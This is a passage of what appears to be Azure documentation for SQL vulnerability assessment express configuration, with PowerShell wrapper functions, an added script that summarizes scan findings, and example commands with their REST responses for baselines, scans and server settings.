        Invoke-SqlVulnerabilityAssessmentScan -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [Location, System.String[]], [Retry-After, System.String[]]...}
        Version    : 1.1
        StatusCode : 202
        Method     : POST
        Content    : {"operation":"ExecuteDatabaseVulnerabilityAssessmentScan","startTime":"2023-05-15T10:58:48.367Z"}
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Post" -Uri $Uri
}


###Sql Vulnerability Assessments Settings### 


# Get
function Get-SqlVulnerabilityAssessmentServerSetting(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName) {
    <#
    .SYNOPSIS
        Gets vulnerability assessment settings of the server.

    .DESCRIPTION
        Gets vulnerability assessment settings of the server.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"properties":{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}
    #>
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview"

    return SendRestRequest -Method "Get" -Uri $Uri
}


# Set
function Set-SqlVulnerabilityAssessmentServerSetting(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $State) {
    <#
    .SYNOPSIS
        Sets vulnerability assessment settings on the server.

    .DESCRIPTION
        Sets vulnerability assessment settings on the server.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER State
        Setting's state ('Enabled' or 'Disabled').

    .EXAMPLE
        Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 'Enabled'

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : PUT
        Content    : {"properties":{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}

    .EXAMPLE
        Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 'Disabled'

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : PUT
        Content    : {"properties":{"state":"Disabled"},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default","name":"Default","type":"Microsoft.Sql/servers/sqlVulnerabilityAssessments"}
    #>
    # Unlike the baseline commands, the request body is built here from the State parameter.
    $Body = @{
        properties = @{
            state = $State
        }
    }
    $Body = $Body | ConvertTo-Json

    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview"

    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}


# Remove
function Remove-SqlVulnerabilityAssessmentServerSetting(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName) {
    <#
    .SYNOPSIS
        Deletes vulnerability assessment settings on the server.

    .DESCRIPTION
        Deletes vulnerability assessment settings on the server.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .EXAMPLE
        Remove-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest

        Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-deletes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : DELETE
        Content    :
    #>
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview"

    return SendRestRequest -Method "Delete" -Uri $Uri
}


# Thin wrapper over Invoke-AzRestMethod: every command above sends an ARM-relative
# path through the signed-in Az context, so no credentials are handled by this module.
function SendRestRequest(
    [Parameter(Mandatory = $True)]
    [string] $Method,
    [Parameter(Mandatory = $True)]
    [string] $Uri,
    [parameter(Mandatory = $false)]
    [string] $Body = "DEFAULT") {

    $Params = @{
        Method = $Method
        Path   = $Uri
    }

    # Only attach a payload when the caller supplied one; GET/DELETE calls send none.
    if (!($Body -eq "DEFAULT")) {
        $Params = @{
            Method  = $Method
            Path    = $Uri
            Payload = $Body
        }
    }

    Invoke-AzRestMethod @Params
}


# Exported functions 

Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentBaseline 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentBaseline 
Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Remove-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentScanResults 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentScans 
Export-ModuleMember -Function Invoke-SqlVulnerabilityAssessmentScan 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentServerSetting 


Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentServerSetting 
Export-ModuleMember -Function Remove-SqlVulnerabilityAssessmentServerSetting 
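As an added example that is not part of the wrapper module above, the script below drives the exported commands to summarize the latest express configuration scan of one database and list its failing rules by severity. It assumes SqlVulnerabilityAssessmentCommands.psm1 is saved in the current directory, that Connect-AzAccount has already been run, that the resource names at the bottom are constructed placeholders, and that a failing rule carries the status "Finding" (the counterpart of the "NonFinding" status shown in the module's examples).

```powershell
# Added example, not part of SqlVulnerabilityAssessmentCommands.psm1.
# Assumes the module is saved in the current directory and Connect-AzAccount has run.
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1

function Get-SqlVaFindingSummary {
    param(
        [Parameter(Mandatory)] [string] $SubscriptionId,
        [Parameter(Mandatory)] [string] $ResourceGroupName,
        [Parameter(Mandatory)] [string] $ServerName,
        [Parameter(Mandatory)] [string] $DatabaseName
    )

    # Common target parameters, splatted into each module command.
    $target = @{
        SubscriptionId    = $SubscriptionId
        ResourceGroupName = $ResourceGroupName
        ServerName        = $ServerName
        DatabaseName      = $DatabaseName
    }

    # Scan summary: per-severity failure counts and whether the baseline was applied.
    $scanResponse = Get-SqlVulnerabilityAssessmentScans @target -ScanId latest
    if ($scanResponse.StatusCode -ne 200) {
        throw "Scan summary request failed with HTTP $($scanResponse.StatusCode): $($scanResponse.Content)"
    }
    $scan = ($scanResponse.Content | ConvertFrom-Json).properties

    # Per-rule results of the same scan. Without -RuleId the module returns the
    # whole list under "value", as in its second Get-...ScanResults example.
    $resultsResponse = Get-SqlVulnerabilityAssessmentScanResults @target -ScanId latest
    if ($resultsResponse.StatusCode -ne 200) {
        throw "Scan results request failed with HTTP $($resultsResponse.StatusCode): $($resultsResponse.Content)"
    }
    $rules = ($resultsResponse.Content | ConvertFrom-Json).value

    # Assumption: a failing rule has status "Finding"; passing rules show "NonFinding".
    $severityRank = @{ High = 0; Medium = 1; Low = 2 }
    $findings = foreach ($rule in $rules) {
        $p = $rule.properties
        if ($p.status -ne 'Finding') { continue }
        [pscustomobject]@{
            RuleId      = $p.ruleId
            Severity    = $p.ruleMetadata.severity
            Category    = $p.ruleMetadata.category
            Title       = $p.ruleMetadata.title
            # A non-null baselineAdjustedResult means a baseline exists for this rule,
            # so the finding survived the baseline comparison and still needs attention.
            HasBaseline = $null -ne $p.baselineAdjustedResult
            Remediation = $p.remediation.description
        }
    }

    [pscustomobject]@{
        ScanId          = $scan.scanId
        State           = $scan.state
        BaselineApplied = $scan.isBaselineApplied
        HighFailed      = $scan.highSeverityFailedRulesCount
        MediumFailed    = $scan.mediumSeverityFailedRulesCount
        LowFailed       = $scan.lowSeverityFailedRulesCount
        TotalRules      = $scan.totalRulesCount
        Findings        = @($findings | Sort-Object { $severityRank[$_.Severity] }, RuleId)
    }
}

# Constructed placeholder names; replace them with your own resources.
$summary = Get-SqlVaFindingSummary -SubscriptionId '00000000-1111-2222-3333-444444444444' `
    -ResourceGroupName 'vulnerabilityaseessmenttestRg' `
    -ServerName 'vulnerabilityaseessmenttest' `
    -DatabaseName 'db'

"Scan $($summary.ScanId): state=$($summary.State) baselineApplied=$($summary.BaselineApplied)"
"Failed rules: High=$($summary.HighFailed) Medium=$($summary.MediumFailed) Low=$($summary.LowFailed) of $($summary.TotalRules)"
$summary.Findings | Format-Table RuleId, Severity, Category, Title, HasBaseline -AutoSize
```

Run it after Invoke-SqlVulnerabilityAssessmentScan has completed; a scan still in progress will not yet have results under the latest scan id.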


Next steps

Express configuration PowerShell commands reference


Express configuration PowerShell commands reference

Article • 06/05/2023


This article lists the PowerShell commands that can be used with SQL vulnerability assessment express configuration.

Make a local copy of the script located in the Express configuration PowerShell wrapper module and save it as SqlVulnerabilityAssessmentCommands.psm1. Once imported, the module can be referenced with the following commands:

• Set SQL vulnerability assessment baseline
• Get SQL vulnerability assessment baseline
• Set SQL vulnerability assessment baseline rule
• Remove SQL vulnerability assessment baseline rule
• Get SQL vulnerability assessment scan results
• Get SQL vulnerability assessment scan
• Invoke SQL vulnerability assessment scan
• Get SQL vulnerability assessment server setting
• Set SQL vulnerability assessment server setting
• Remove SQL vulnerability assessment server setting


Set SQL vulnerability assessment baseline

Example 1:


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ "properties": { "latestScan": true, "results": {} } }'

Results:

Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : PUT
Content    : {"properties":{"results":{"VA1143":[["True"]],"VA1219":[["False"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}

With "latestScan": true and an empty "results" object, the service copies the rule
results of the latest scan into the baseline; the response shows the rows it stored.


Example 2:

Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{
    "properties": {
        "latestScan": false,
        "results": {
            "VA2062": [
                [
                    "AllowAll",
                    "0.0.0.0",
                    "255.255.255.255"
                ]
            ]
        }
    }
}'

Results:

Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : PUT
Content    : {"properties":{"results":{"VA2062":[["AllowAll","0.0.0.0","255.255.255.255"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}


Get SQL vulnerability assessment baseline


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db


Results:

Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-reads, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"properties":{"results":{"VA1143":[["True"]],"VA1219":[["False"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}


Set SQL vulnerability assessment baseline rule


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Set-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062 -Body '{
    "properties": {
        "latestScan": false,
        "results": [
            [
                "AllowAll",
                "0.0.0.0",
                "255.255.255.255"
            ]
        ]
    }
}'

Note that for a single rule "results" is the array of expected rows, not an object keyed
by rule ID as in the whole-baseline body.

Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : PUT
Content    : {"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}


Get SQL vulnerability assessment baseline rule

Example 1:

Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}


Example 2:

Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

Without -RuleId the command lists every rule in the baseline:

Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"value":[{"properties":{"results":[["True"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1143","name":"VA1143","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"},{"properties":{"results":[["False"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/migrationsqli/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1219","name":"VA1219","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"},{"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}]}


Remove SQL vulnerability assessment baseline rule


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Remove-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : DELETE
Content    :


Get SQL vulnerability assessment scan results

Example 1:

Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest -RuleId VA2062


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"properties":{"ruleId":"VA2062","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[],"remediation":{"description":"Remove database firewall rules that grant excessive access","scripts":[],"automated":false,"portalLink":""},"baselineAdjustedResult":null,"ruleMetadata":{"ruleId":"VA2062","severity":"High","category":"SurfaceAreaReduction","ruleType":"NegativeList","title":"Database-level firewall rules should not grant excessive access","description":"The Azure SQL Database-level firewall helps protect your data by preventing all access to your database until you specify which IP addresses have permission. Database-level firewall rules grant access to the specific database based on the originating IP address of each request.\n\nDatabase-level firewall rules for master and user databases can only be created and managed through Transact-SQL (unlike server-level firewall rules which can also be created and managed using the Azure portal or PowerShell). For more details please see: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-firewall-configure\n\nThis check verifies that each database-level firewall rule does not grant access to more than 255 IP addresses.","rationale":"Often, administrators add rules that grant excessive access as part of a troubleshooting process - to eliminate the firewall as the source of a problem, they simply create a rule that allows all traffic to pass to the affected database.\n\nGranting excessive access using database firewall rules is a clear security concern, as it violates the principle of least privilege by allowing unnecessary access to your database. In fact, it's the equivalent of placing the database outside of the firewall.","queryCheck":{"query":"SELECT name AS [Firewall Rule Name]\n    ,start_ip_address AS [Start Address]\n    ,end_ip_address AS [End Address]\nFROM sys.database_firewall_rules\nWHERE ( \n    (CONVERT(bigint, parsename(end_ip_address, 1)) +\n     CONVERT(bigint, parsename(end_ip_address, 2)) * 256 + \n     CONVERT(bigint, parsename(end_ip_address, 3)) * 65536 + \n     CONVERT(bigint, parsename(end_ip_address, 4)) * 16777216 ) \n    - \n    (CONVERT(bigint, parsename(start_ip_address, 1)) +\n     CONVERT(bigint, parsename(start_ip_address, 2)) * 256 + \n     CONVERT(bigint, parsename(start_ip_address, 3)) * 65536 + \n     CONVERT(bigint, parsename(start_ip_address, 4)) * 16777216 ) ) > 255","expectedResult":[],"columnNames":["Firewall Rule Name","Start Address","End Address"]},"benchmarkReferences":[]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA2062/scanResults/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"}

A "NegativeList" rule such as VA2062 passes when its query returns no rows
("expectedResult": []); any row the query does return is a finding, and
"queryResults" carries those rows.


Example 2:


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"value":[{"properties":{"ruleId":"VA1219","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[["False"]],"remediation":{"description":"Enable TDE on the affected databases","scripts":[],"automated":false,"portalLink":"EnableTDE"},"baselineAdjustedResult":{"baseline":{"expectedResults":[["False"]],"updatedTime":"2023-05-15T08:52:39.3476874+00:00"},"status":"NonFinding","resultsNotInBaseline":[],"resultsOnlyInBaseline":[]},"ruleMetadata":{"ruleId":"VA1219","severity":"Medium","category":"DataProtection","ruleType":"Binary","title":"Transparent data encryption should be enabled","description":"Transparent data encryption (TDE) helps to protect the database files against information disclosure by performing real-time encryption and decryption of the database, associated backups, and transaction log files 'at rest', without requiring changes to the application. This rule checks that TDE is enabled on the database.","rationale":"Transparent Data Encryption (TDE) protects data 'at rest', meaning the data and log files are encrypted when stored on disk.","queryCheck":{"query":"SELECT CASE\n    WHEN EXISTS (\n        SELECT *\n        FROM sys.databases\n        WHERE db_name(database_id) = db_name()\n            AND is_encrypted = 0 )\n    THEN 1\n    ELSE 0\n    END AS [Violation]","expectedResult":[["0"]],"columnNames":["Violation"]},"benchmarkReferences":[{"benchmark":"FedRAMP","reference":null}]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1219/scanResults/VA1219","name":"VA1219","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"},{"properties":{"ruleId":"VA1223","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[],"remediation":{"description":"Create new certificates, re-encrypt the data/sign-data using the new key, and drop the affected keys.","scripts":[],"automated":false,"portalLink":""},"baselineAdjustedResult":null,"ruleMetadata":{"ruleId":"VA1223","severity":"High","category":"DataProtection","ruleType":"NegativeList","title":"Certificate keys should use at least 2048 bits","description":"Certificate keys are used in RSA and other encryption algorithms to protect data. These keys need to be of enough length to secure the user's data. This rule checks that the key's length is at least 2048 bits for all certificates.","rationale":"Key length defines the upper-bound on the encryption algorithm's security. Using short keys in encryption algorithms may lead to weaknesses in data-at-rest protection.","queryCheck":{"query":"SELECT name AS [Certificate Name], thumbprint AS [Thumbprint]\nFROM sys.certificates\nWHERE key_length < 2048","expectedResult":[],"columnNames":["Certificate Name","Thumbprint"]},"benchmarkReferences":[{"benchmark":"FedRAMP","reference":null}]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1223/scanResults/VA1223","name":"VA1223","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"}]}

When a baseline exists for a rule (VA1219 above), "baselineAdjustedResult" shows the
stored expected rows and the status after the baseline was applied, plus the rows
that differ in either direction ("resultsNotInBaseline", "resultsOnlyInBaseline").


Get SQL vulnerability assessment scan

Example 1:


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"properties":{"scanId":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","triggerType":"OnDemand","state":"Passed","startTime":"2023-04-17T12:52:41.4142209Z","endTime":"2023-04-17T12:52:41.5235755Z","server":"vulnerabilityaseessmenttest","database":"db","sqlVersion":"16.0.5100","highSeverityFailedRulesCount":0,"mediumSeverityFailedRulesCount":0,"lowSeverityFailedRulesCount":0,"totalPassedRulesCount":24,"totalFailedRulesCount":0,"totalRulesCount":24,"isBaselineApplied":true},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/migrationscripttests/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e","name":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","type":"Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}


Example 2:


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

Without -ScanId the command lists the scan history of the database:

Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
Version    : 1.1
StatusCode : 200
Method     : GET
Content    : {"value":[{"properties":{"scanId":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","triggerType":"OnDemand","state":"Passed","startTime":"2023-04-17T12:52:41.4142209Z","endTime":"2023-04-17T12:52:41.5235755Z","server":"vulnerabilityaseessmenttest","database":"db","sqlVersion":"16.0.5100","highSeverityFailedRulesCount":0,"mediumSeverityFailedRulesCount":0,"lowSeverityFailedRulesCount":0,"totalPassedRulesCount":24,"totalFailedRulesCount":0,"totalRulesCount":24,"isBaselineApplied":true},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e","name":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","type":"Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}]}


Invoke SQL vulnerability assessment scan


Azure PowerShell


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1
Invoke-SqlVulnerabilityAssessmentScan -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db


Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [Location, System.String[]], [Retry-After, System.String[]]...}
Version    : 1.1
StatusCode : 202
Method     : POST
Content    : {"operation":"ExecuteDatabaseVulnerabilityAssessmentScan","startTime":"2023-05-15T10:58:48.367Z"}

The 202 status means the scan was accepted and runs asynchronously (note the Location
